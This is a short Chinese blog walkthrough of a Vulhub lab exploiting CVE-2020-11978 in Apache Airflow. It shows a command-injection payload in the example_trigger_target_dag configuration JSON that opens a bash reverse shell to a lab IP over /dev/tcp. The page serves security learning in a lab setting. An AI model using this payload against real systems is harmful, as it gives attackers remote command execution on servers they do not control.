当前位置: 首页 > news >正文

Vulhub Apache Airflow (CVE-2020-11978)

来到目录下初始化数据库

然后开启环境

查看端口访问

访问`http://your-ip:8080`进入airflow管理端,将`example_trigger_target_dag`前面的Off改为On:

再点击执行按钮,在Configuration JSON中输入:{"message":"'\";bash -i >& /dev/tcp/192.168.94.129/9999 0>&1;#"}

运行完,可以看到成功反弹shell,可以命令执行了。


http://www.mrgr.cn/news/22149.html

相关文章:

  • QML入门之创建可重用的组件(一)
  • 828华为云征文|Flexus X实例C#/.Net Core 结合(git代码管理、docker自定义镜像)快速发布部署-让你的项目飞起来~
  • 【微前端记录】微前端qiankun初体验
  • 面试字节视觉大模型算法岗,太难了。。。
  • Linux在桌面上创建软件启动快捷方式
  • systemverilog如何用一行code输出两个队列在可变范围内的对比结果
  • 【大数据算法】一文掌握大数据算法之:空间亚线性算法。
  • vulhub GhostScript 沙箱绕过(CVE-2018-16509)
  • GNU风格代码编译(27)
  • react js 笔记 3
  • 【系统架构设计师】抽象工厂设计模式
  • 【c++进阶[五]】list相关接口介绍及list和vector的对比
  • ISAC: Toward Dual-Functional Wireless Networks for 6G and Beyond【论文阅读笔记】
  • golang fmt.Printf中 %q
  • 创建表时添加约束
  • Mac在Python项目中通过opencv模版匹配定位不到图片
  • Oracle rman 没有0级时1级备份和0级大小一样,可以用来做恢复 resetlogs后也可以
  • MySQL record 03 part
  • Elasticsearch Mapping 详解
  • C++11 智能指针